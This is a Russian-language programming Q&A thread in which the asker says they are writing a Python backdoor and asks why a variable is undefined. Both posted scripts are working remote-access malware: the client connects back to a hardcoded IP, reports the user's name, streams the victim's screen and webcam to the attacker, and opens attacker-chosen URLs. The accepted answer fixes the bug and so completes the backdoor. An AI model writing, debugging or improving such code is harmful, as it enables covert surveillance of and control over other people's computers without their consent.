# Значение url переместить в другой python файл

Tags: python

Я делаю BackDoor на python, мне нужно что бы при вводе ссылки у себя, у удалённой машины открывался сайт который я введу, но у меня возникает во такая ошибка:

webbrowser.open(url, new=1)
NameError: name 'url' is not defined

**Server.py:**

```
from vidstream import *
from colorama import init, Fore
import socket
import os

init()

local_ip_address = socket.gethostbyname(socket.gethostname())
socket_port = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((local_ip_address, socket_port))
s.listen(5)

client, addr = s.accept()
network_name = client.recv(1024).decode("utf-8")

print(f"[+] {addr[0]} ({addr[1]}) | {network_name}")

server = StreamingServer(local_ip_address, 9999)
server.start_server()
print("[~] The server was successfully connected")

while True:
    cmd = input(f"{Fore.GREEN}{addr[0]}@{network_name}~#{Fore.RESET}{Fore.LIGHTGREEN_EX} ")

    if cmd == "screen":
        client.send(cmd.encode("utf-8"))
    elif cmd == "webcam":
        client.send(cmd.encode("utf-8"))
    elif cmd == "cls":
        os.system("cls")
    elif cmd == "website":
        url = input('Введите ссылку: ')
        client.send(cmd.encode("utf-8"))
```

**CLIENT.PY:**

```
from vidstream import *
import socket
import getpass
import webbrowser

host = "26.169.92.35"
socket_port = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, socket_port))

s.send(str(getpass.getuser()).encode("utf-8"))

while True:
    cmd_data = s.recv(1024).decode("utf-8")

    if cmd_data == "screen":
        screen = ScreenShareClient(host, 9999)
        screen.start_stream()
    elif cmd_data == "webcam":
        camera = CameraClient(host, 9999)
        camera.start_stream()
    elif cmd_data == "website":
        webbrowser.open(url, new=1)
```

Comment: Я может что-то не понимаю а где в твоем коде CLIENT.PY переменная url?

Comment: На самое последней строчке

Comment: Ну я вижу  webbrowser.open(url, new=1), а саму переменную url ты где определил?

Answer (score 0, accepted):

Предлагаю такое решение:

**server.py**

```
...
while True:
    cmd = input(f"{Fore.GREEN}{addr[0]}@{network_name}~#{Fore.RESET}{Fore.LIGHTGREEN_EX} ")

    if cmd == "screen":
        client.send(cmd.encode("utf-8"))
    elif cmd == "webcam":
        client.send(cmd.encode("utf-8"))
    elif cmd == "cls":
        os.system("cls")
    elif cmd == "website":
        url = input('Введите ссылку: ')
        client.send((cmd + ' ' + url).encode("utf-8")) # <---
```

**client.py**

```
...
while True:
    cmd, data = s.recv(1024).decode("utf-8").split(' ') # <---

    if cmd == "screen": # <---
        screen = ScreenShareClient(host, 9999)
        screen.start_stream()
    elif cmd == "webcam": # <---
        camera = CameraClient(host, 9999)
        camera.start_stream()
    elif cmd == "website": # <---
        webbrowser.open(data, new=1) # <---
```